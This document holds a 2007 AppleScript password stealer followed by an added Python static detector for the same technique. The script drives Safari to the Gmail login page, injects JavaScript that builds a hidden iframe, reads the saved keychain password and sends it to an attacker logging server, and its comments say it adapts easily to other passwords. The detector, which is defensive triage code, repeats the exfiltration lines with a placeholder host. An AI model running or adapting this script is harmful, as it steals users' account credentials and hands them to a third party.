This script steals the Gmail password saved in the keychain by injecting JavaScript into Safari: it opens the Gmail login page, reads the saved password, and sends it to a logging server using a hidden iframe.
```applescript
-- This script can be used to steal gmail's keychained password by injecting
-- JavaScript into Safari. When executed it opens gmail's login page, reads
-- saved password and sends it to a logging server by creating a hidden iframe
-- into gmail's page. It can be easily modified to steal other passwords.
-- poplix papuasia.org -- http://px.dynalias.org -- 09-22-2007

--Your logging server
set LOGGING_URL to "http://thief.dynalias.org/log.php?p="

--Creates a hidden iframe into google's login DIV
set HIDDENFRAME to "document.getElementById('login').innerHTML+='<iframe id=steal width=0 height=0></iframe>'"

--Stealing code
set JSTEAL to "document.getElementById('steal').src='" & LOGGING_URL & "'+document.getElementById('gaia_loginform').Passwd.value"

--Open gmail login page
tell application "Safari"
	open location "https://www.google.com/accounts/ServiceLogin?service=mail"
end tell

--Wait loading...
delay 10

--Create a hidden iframe to load LOGGING_URL
tell application "Safari"
	do JavaScript HIDDENFRAME in document 1
end tell

delay 1

--Send password to LOGGING_URL
tell application "Safari"
	do JavaScript JSTEAL in document 1
end tell
```
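For triage of AppleScript source files, the following static check flags the pattern this script relies on: a Safari `do JavaScript` payload that builds a zero-size iframe, reads a password field, and assigns the value to a remote URL. It is an added example, not part of the original script; the sample input is constructed, and `collector.example.invalid`, the function names `scan` and `resolve`, and the rule names are assumptions. It only handles multi-line `tell application "Safari"` blocks and simple `set NAME to "…" & NAME` string assignments.

```python
import re

# Constructed sample with the same structure as the script above; the URL is a placeholder.
SAMPLE = r'''
set LOGGING_URL to "http://collector.example.invalid/log?p="
set HIDDENFRAME to "document.getElementById('login').innerHTML+='<iframe id=steal width=0 height=0></iframe>'"
set JSTEAL to "document.getElementById('steal').src='" & LOGGING_URL & "'+document.getElementById('gaia_loginform').Passwd.value"
tell application "Safari"
do JavaScript HIDDENFRAME in document 1
end tell
tell application "Safari"
do JavaScript JSTEAL in document 1
end tell
'''

SET_RE = re.compile(r'^\s*set\s+(\w+)\s+to\s+(.+)$', re.I)
DO_JS_RE = re.compile(r'^\s*do\s+JavaScript\s+(.+?)\s+in\s+', re.I)
TERM_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|(\w+)')  # quoted literal or variable name

# Rules are applied to the JavaScript text after variables are substituted.
RULES = {
    "hidden-iframe": re.compile(r"<iframe[^>]*(?:width|height)\s*=\s*['\"]?0\b", re.I),
    "reads-password-field": re.compile(r"passw(?:or)?d\w*['\"\)\]]*\.value", re.I),
    "sends-to-remote-url": re.compile(r"\.src\s*=\s*['\"]https?://", re.I),
}

def resolve(expr, env):
    """Evaluate an AppleScript '&' concatenation of string literals and known variables."""
    parts = []
    for m in TERM_RE.finditer(expr):
        parts.append(env.get(m.group(2).lower(), "") if m.group(2) else m.group(1))
    return "".join(parts)

def scan(source):
    """Return (line_number, rule_name) for each rule hit inside a Safari tell block."""
    env, in_safari, findings = {}, False, []
    for n, line in enumerate(source.splitlines(), 1):
        if re.match(r'\s*tell\s+application\s+"Safari"', line, re.I):
            in_safari = True
        elif re.match(r'\s*end\s+tell', line, re.I):
            in_safari = False
        elif (m := SET_RE.match(line)):
            env[m.group(1).lower()] = resolve(m.group(2), env)  # AppleScript names are case-insensitive
        elif in_safari and (m := DO_JS_RE.match(line)):
            js = resolve(m.group(1), env)
            findings += [(n, name) for name, rx in RULES.items() if rx.search(js)]
    return findings
```

A file in which the same `do JavaScript` call triggers both `reads-password-field` and `sends-to-remote-url` is the combination worth escalating; either rule alone also matches legitimate automation.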